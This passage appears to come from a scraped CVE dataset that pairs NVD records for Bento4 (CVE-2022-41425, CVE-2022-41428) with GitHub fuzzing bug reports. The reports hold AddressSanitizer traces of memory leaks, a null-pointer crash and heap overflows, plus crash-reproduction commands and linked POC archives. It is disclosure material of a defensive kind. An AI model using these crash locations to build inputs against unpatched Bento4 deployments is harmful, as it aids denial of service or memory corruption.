China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)) Thank you for your time!
Detected memory leaks in mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/768/comments
0
2022-09-21T16:36:04Z
2023-06-26T05:25:33Z
https://github.com/axiomatic-systems/Bento4/issues/768
1,381,208,895
768
CVE-2022-41425
2022-10-03T14:15:23.473
Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_Processor::ProcessFragments function in mp4decrypt.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/772" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/772
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hi there, These are some faults that maybe lead to serious consequences in mp4xx, the version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker), these binary-crashes with the following. # Bug1 Detected memory leaks in mp4spilt: ``` root@32345fj4sds:/fuzz-mp4split/mp4split# ./mp4split --video ../out/crashes/poc_split_1 --video option specified, but no video track found ================================================================= ==1889275==ERROR: LeakSanitizer: detected memory leaks Indirect leak of 592 byte(s) in 2 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x462e2f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462e2f) #3 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27) #4 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11) Indirect leak of 256 byte(s) in 1 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x45904a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45904a) #3 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f) #4 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f) #5 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30) #6 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558) #7 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba) #8 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 224 byte(s) in 7 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558) #3 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba) #4 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 192 byte(s) in 2 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f) #3 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f) #4 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30) #5 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558) #6 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba) #7 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 176 byte(s) in 2 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f) #3 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30) #4 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558) #5 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba) #6 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) …… …… Indirect leak of 24 byte(s) in 1 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4bdd4d in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) (/fuzz-mp4split/mp4split/mp4split+0x4bdd4d) #3 0x45831c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45831c) #4 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f) #5 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27) #6 0x48e726 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x48e726) #7 0x45dc8c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45dc8c) #8 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f) #9 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27) #10 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11) Indirect leak of 1 byte(s) in 1 object(s) allocated from: #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x771319 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) (/fuzz-mp4split/mp4split/mp4split+0x771319) #3 0x539cf7 in AP4_InitialObjectDescriptor::AP4_InitialObjectDescriptor(AP4_ByteStream&, unsigned char, unsigned int, unsigned int) (/fuzz-mp4split/mp4split/mp4split+0x539cf7) #4 0x7713f7 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) (/fuzz-mp4split/mp4split/mp4split+0x7713f7) #5 0x4e9d46 in AP4_IodsAtom::Create(unsigned int, AP4_ByteStream&) (/fuzz-mp4split/mp4split/mp4split+0x4e9d46) #6 0x4558fa in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x4558fa) #7 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f) #8 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27) #9 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11) SUMMARY: AddressSanitizer: 2750 byte(s) leaked in 39 allocation(s). ``` # Bug2 SEGV on unknown address 0x000000000028 in mp4decrypt: ``` root@23435332df4:/fuzz-mp4decrypt/mp4decrypt# ./mp4decrypt ../out/crashes/poc_decrypt_1 /dev/null WARNING: atom serialized to fewer bytes than declared size AddressSanitizer:DEADLYSIGNAL ================================================================= ==2367709==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x0000005da294 bp 0x7ffcee6b84c0 sp 0x7ffcee6b6b60 T0) ==2367709==The signal is caused by a READ memory access. ==2367709==Hint: address points to the zero page. #0 0x5da294 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5da294) #1 0x5f795d in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5f795d) #2 0x414e8b in main (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x414e8b) #3 0x7fdba0338c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #4 0x407b69 in _start (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x407b69) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5da294) in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) ==2367709==ABORTING ``` # Bug3 Detected memory leaks in mp4mux: ``` root@wha446aq:/# ./Bento4/cmakebuild/mp4mux --track h264:poc_mp4mux_1 /dev/null ERROR: Feed() failed (-10) ================================================================= ==17429==ERROR: LeakSanitizer: detected memory leaks Direct leak of 148 byte(s) in 1 object(s) allocated from: #0 0x4f5ce8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x52d6b2 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/Bento4/cmakebuild/mp4mux+0x52d6b2) SUMMARY: AddressSanitizer: 148 byte(s) leaked in 1 allocation(s). ``` # POC [Bug_1_POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635069/Bug_1_POC.zip) [Bug_2_POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635073/Bug_2_POC.zip) [Bug_3_POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635075/Bug_3_POC.zip) # Environment Ubuntu 18.04.6 LTS (docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch(5b7cc25) && Bento4 release version([1.6.0-639](https://www.bok.net/Bento4/binaries/Bento4-SDK-1-6-0-639.x86_64-unknown-linux.zip)) # Credit Xudong Cao ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)) Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Jiayuan Zhang ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Thank you for your time!
Some vulnerabilities about mp4xx can cause serious errors
https://api.github.com/repos/axiomatic-systems/Bento4/issues/772/comments
0
2022-09-23T15:37:03Z
2023-06-26T05:24:50Z
https://github.com/axiomatic-systems/Bento4/issues/772
1,383,983,547
772
CVE-2022-41428
2022-10-03T14:15:24.697
Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadBits function in mp4mux.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/773" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/773
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hello, I found three heap buffer overflow bugs in AP4_Atom::TypeFromString(char const*), AP4_BitReader::ReadBit() and AP4_BitReader::ReadBits(unsigned int). They come from mp4tag and mp4mux, respectively. # Bug1 Heap-buffer-overflow on address 0x602000000332 in mp4tag: ``` root@728d9sls452:/fuzz-mp4tag/mp4tag# ./mp4tag --remove 1 ../out/crashes/mp4tag_poc_1 /dev/null ================================================================= ==1647110==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000332 at pc 0x000000468f25 bp 0x7fff3510c600 sp 0x7fff3510c5f8 READ of size 1 at 0x602000000332 thread T0 #0 0x468f24 in AP4_Atom::TypeFromString(char const*) (/fuzz-mp4tag/mp4tag/mp4tag+0x468f24) #1 0x755566 in AP4_MetaData::Entry::FindInIlst(AP4_ContainerAtom*) const (/fuzz-mp4tag/mp4tag/mp4tag+0x755566) #2 0x75a3f2 in AP4_MetaData::Entry::RemoveFromFileIlst(AP4_File&, unsigned int) (/fuzz-mp4tag/mp4tag/mp4tag+0x75a3f2) #3 0x42fc2c in RemoveTag(AP4_File*, AP4_String&, bool) (/fuzz-mp4tag/mp4tag/mp4tag+0x42fc2c) #4 0x418531 in main (/fuzz-mp4tag/mp4tag/mp4tag+0x418531) #5 0x7fdb89b2ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #6 0x407f09 in _start (/fuzz-mp4tag/mp4tag/mp4tag+0x407f09) 0x602000000332 is located 0 bytes to the right of 2-byte region [0x602000000330,0x602000000332) allocated by thread T0 here: #0 0x996920 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fdb8a1a9297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x418531 in main (/fuzz-mp4tag/mp4tag/mp4tag+0x418531) #3 0x7fdb89b2ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4tag/mp4tag/mp4tag+0x468f24) in AP4_Atom::TypeFromString(char const*) Shadow bytes around the buggy address: 0x0c047fff8010: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 05 0x0c047fff8020: fa fa 01 fa fa fa 01 fa fa fa fd fa fa fa 03 fa 0x0c047fff8030: fa fa fd fa fa fa 06 fa fa fa 00 fa fa fa fd fa 0x0c047fff8040: fa fa 04 fa fa fa fd fd fa fa fd fa fa fa 01 fa 0x0c047fff8050: fa fa fd fa fa fa 00 00 fa fa 05 fa fa fa 00 00 =>0x0c047fff8060: fa fa 02 fa fa fa[02]fa fa fa 05 fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1647110==ABORTING ``` # Bug2 Heap-buffer-overflow on address 0x6020000000f8 in mp4mux (AP4_BitReader::ReadBits): ``` root@23iq42wasf35:/fuzz-mp4mux/mp4mux# \./mp4mux --track h264:../out/crashes/id\:000045\,sig\:06\,src\:000002\,op\:int32\,pos\:33\,val\:\+0\,470985 /dev/null ================================================================= ==2473731==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f8 at pc 0x000000649cb8 bp 0x7ffced185f90 sp 0x7ffced185f88 READ of size 1 at 0x6020000000f8 thread T0 #0 0x649cb7 in AP4_BitReader::ReadBits(unsigned int) (/fuzz-mp4mux/mp4mux/mp4mux+0x649cb7) #1 0x4d6040 in ReadGolomb(AP4_BitReader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6040) #2 0x4d6ef9 in AP4_AvcFrameParser::ParsePPS(unsigned char const*, unsigned int, AP4_AvcPictureParameterSet&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6ef9) #3 0x4f01dd in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4f01dd) #4 0x4ecbf1 in AP4_AvcFrameParser::Feed(void const*, unsigned int, unsigned int&, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ecbf1) #5 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5) #6 0x7fb87db03c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #7 0x407df9 in _start (/fuzz-mp4mux/mp4mux/mp4mux+0x407df9) 0x6020000000f8 is located 0 bytes to the right of 8-byte region [0x6020000000f0,0x6020000000f8) allocated by thread T0 here: #0 0xa84ba0 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fb87e17e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4f01dd in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4f01dd) #3 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5) #4 0x7fb87db03c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4mux/mp4mux/mp4mux+0x649cb7) in AP4_BitReader::ReadBits(unsigned int) Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fd =>0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa 06 fa fa fa 00[fa] 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2473731==ABORTING ``` # Bug3 Heap-buffer-overflow on address 0x602000000158 in mp4mux (AP4_BitReader::ReadBit): ``` root@345sadsf12w332:/fuzz-mp4mux/mp4mux# ./mp4mux --track h264:../out/crashes/id\:000001\,sig\:06\,src\:000002\,op\:flip1\,pos\:8\,10085 /dev/null ================================================================= ==1606856==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000158 at pc 0x00000064a882 bp 0x7ffd08428400 sp 0x7ffd084283f8 READ of size 1 at 0x602000000158 thread T0 #0 0x64a881 in AP4_BitReader::ReadBit() (/fuzz-mp4mux/mp4mux/mp4mux+0x64a881) #1 0x4d6456 in ReadGolomb(AP4_BitReader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6456) #2 0x4dcd9e in AP4_AvcFrameParser::ParseSliceHeader(unsigned char const*, unsigned int, unsigned int, unsigned int, AP4_AvcSliceHeader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4dcd9e) #3 0x4ed906 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ed906) #4 0x4ecbf1 in AP4_AvcFrameParser::Feed(void const*, unsigned int, unsigned int&, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ecbf1) #5 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5) #6 0x7fd9e3df9c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #7 0x407df9 in _start (/fuzz-mp4mux/mp4mux/mp4mux+0x407df9) 0x602000000158 is located 0 bytes to the right of 8-byte region [0x602000000150,0x602000000158) allocated by thread T0 here: #0 0xa84ba0 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fd9e4474297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ed906 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ed906) #3 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5) #4 0x7fd9e3df9c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4mux/mp4mux/mp4mux+0x64a881) in AP4_BitReader::ReadBit() Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fd 0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa fd fa fa fa fd fa =>0x0c047fff8020: fa fa 06 fa fa fa 07 fa fa fa 00[fa]fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1606856==ABORTING ``` # POC [Bug_1_POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635523/Bug_1_POC.zip) [Bug-2-POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635529/Bug-2-POC.zip) [Bug-3-POC.zip](https://github.com/axiomatic-systems/Bento4/files/9635530/Bug-3-POC.zip) # Environment Ubuntu 18.04.6 LTS (docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch(5b7cc25) && Bento4 release version([1.6.0-639](https://www.bok.net/Bento4/binaries/Bento4-SDK-1-6-0-639.x86_64-unknown-linux.zip)) # Credit Xudong Cao ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory) Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Jiayuan Zhang ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Hao Zhang ([NCNIPC of China](http://www.nipc.org.cn/)), ([Xidian University](https://www.xidian.edu.cn/)) Thank you for your time!
Some heap-buffer-overflow bugs in Bento4
https://api.github.com/repos/axiomatic-systems/Bento4/issues/773/comments
0
2022-09-23T16:44:03Z
2023-06-12T07:07:50Z
https://github.com/axiomatic-systems/Bento4/issues/773
1,384,054,185
773
CVE-2022-41500
2022-10-18T23:15:09.380
EyouCMS V1.5.9 was discovered to contain multiple Cross-Site Request Forgery (CSRF) vulnerabilities via the Members Center, Editorial Membership, and Points Recharge components.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/27#issue-1410014422" } ]
